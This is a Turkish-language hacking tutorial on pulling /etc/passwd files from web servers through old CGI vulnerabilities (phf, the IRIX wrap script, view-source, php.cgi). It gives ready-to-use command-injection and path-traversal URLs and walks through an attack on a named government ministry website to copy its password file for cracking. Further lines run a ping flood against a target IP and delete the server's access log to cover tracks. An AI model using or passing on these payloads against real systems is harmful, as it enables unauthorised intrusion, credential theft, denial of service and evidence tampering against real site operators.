|
Selam arkadaþlar.
Bu bölümle hacking için passwd dosyalarýnýn alýmýna baþlýyoruz. En önemli
kýsýmlardan biri olan bu bölüm uzun sürecek. Ýlk olarak PHF tekniðini
inceleyeceðiz. Bu teknik çok basit bir yöntemdir. Ama tabiki iþe yarar. Ama her sitede
deðil. Daha çok web site hackingte kullanýlýr.
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme web uzerinden
baglanip shellde bazi komutlari calistirabilirsiniz... Not : Calistirdiginiz komutlar cd,
ls, cat gibi komutlar silme islemlerini phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan passwd
dosyasini alabilir ve kirabilirsiniz... Bu olay web uzerinden olur
ve hizli olur
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin
sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlar sistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd etc dizinin altindaki
passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :
/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki
dosyalar goruntulenir...
/cgi-bin/phf?Qalias=x%0als%20pass* yazarsaniz bulundugunuz dizinde
pass ile baslayan butun dosyalari listeler... Komutun Kullanimi Kolay! Simdi Biraz Ornek
Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim yok
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin adresi : www.saglik.gov.tr
Browser inizi calistirin...Adres olarak www.saglik.gov.tr yazin. Evet sayfa geldi simdi
bakalim phf acigi
var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als
yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor... Simdi passwd dosyasini
alalim... cat /etc/passwd
komutu ile... bu nu phf ile asagidaki gibi yaziliyor...
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz!
bunu simdi cut/copy/paste ile bir dosyaya saklayin...
CGI-BIN 'de güvenlik Açýklarý (Düzenleyen Projman)
a- (Phf scripti): Pek çok web ana bilgisayarý CGI-BIN güvenliðinden yoksundur. Bir de bunun
üzerine sistem yöneticilerinin CGI-BIN güvenlik açýklarýný bilmemesi potansiyel
sistem açýklarýna yol açmaktadýr. Tüm dünyada pek çok hacker'ýn kullandýðý
cgi-bin güvenlik açýðý:
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazý uyanýk sistem yöneticileri phf komutunun
kullanýmýný sýnýrlamýþlardýr. Bu yüzden bu komutu çalýþtýramayabilirsiniz.
Fakat yine de alternatif web makinalarý üzerinde denemekte yarar var.
b- (Wrap Scripti): Irix iþletim sisteminin 6.2 versiyonunda rastlanan bu hatayý da þöyle
istismar edebiliriz:
http://www.kýracaðýmýzadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kýracaðýmýzadres.com.tr/cgi-bin/wrap?%0als
(...)
Dikkat edeceðimiz tek nokta bu hata sadece IRIX 6.2'de
var. !!
c- (View Source Scripti): Denemek serbest (baþarýya ulaþabilme ihtimali kadar ulaþamama
ihtimali de var)
http://www.kýracaðýmýzadres.com.tr/cgi-bin/view-source?../../../etc/passwd
ya da
http://www.kýracaðýmýzadres.com.tr/cgi-bin/view-source?%1b
or %0a %20
d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Diðer Denenebilir Scriptler:
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
http://www.kýracaðýmýzadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Dikkat: Tüm Httpd giriþleri ana
bilgisayarlarda günlük þeklinde tutulmaktadýr. Bu yüzden güvenliði çok yüksek ve
sizin baþýnýza bela açacaðýnýzý düþündüðünüz sitelere bu yöntemle
eriþmeyi kesinlikle düþünmeyin !!!
|
